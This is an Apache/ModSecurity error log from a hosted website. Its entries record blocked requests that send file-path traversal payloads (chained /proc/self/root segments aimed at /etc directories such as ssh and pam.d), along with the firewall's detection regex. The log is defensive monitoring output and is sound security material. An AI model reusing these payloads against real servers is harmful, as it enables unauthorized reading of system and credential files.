[Fri Mar 20 04:06:08.499129 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:50634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx4PXLqtnMIWvjpaJsxgAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:10.947453 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:39080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx4hCii7xarUs8iHY4ZgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:12.322944 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.243.128:39088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx5PHIg5MgXLBnicPO4QAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:16.037110 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:39094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx6PXLqtnMIWvjpaJszAAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:17.347895 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:39096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx6V1pVZ5mVmJwsFMEtAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:18.603461 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:39100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx6l1pVZ5mVmJwsFMEtgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:19.900236 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:56786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx69a6ubjKNq_cu4airAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:21.185905 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:56790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx7TJ3M9BSuKP7CAbkPQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:22.506091 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:56792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx7ta6ubjKNq_cu4airgAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:24.827005 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.243.128:56800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx8PHIg5MgXLBnicPO6gAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:26.130887 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:56802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx8vXLqtnMIWvjpaJszwAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:28.593500 2026] [mime_magic:error] [pid 11167:tid 140411666392832] (70014)End of file found: [client 74.7.243.128:56818] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/opt/hp/hpssacli
[Fri Mar 20 04:06:32.875513 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.241.31:60140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx-DJ3M9BSuKP7CAbkUgAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:06:39.153350 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:47452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx__XLqtnMIWvjpaJs4AAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:06:40.959315 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:50654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx__qxLDW4GITHUkS1kwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:06:42.248516 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.241.31:57062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyAvHIg5MgXLBnicPO9AAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:43.587027 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:57066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyAwF0L0L-SsrnPo47sAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:06:45.947648 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.241.31:57078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyBV1pVZ5mVmJwsFMEyAAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:50.658817 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:45528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyCgF0L0L-SsrnPo47uAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:06:51.917363 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:45540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyCxCii7xarUs8iHY4fwAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:07:10.854399 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:47622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyHvqxLDW4GITHUkS1uAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:07:16.280533 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.243.128:47748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyJPHIg5MgXLBnicPPEwAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:07:17.571000 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:47752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyJRCii7xarUs8iHY4jwAAAhE"], referer: 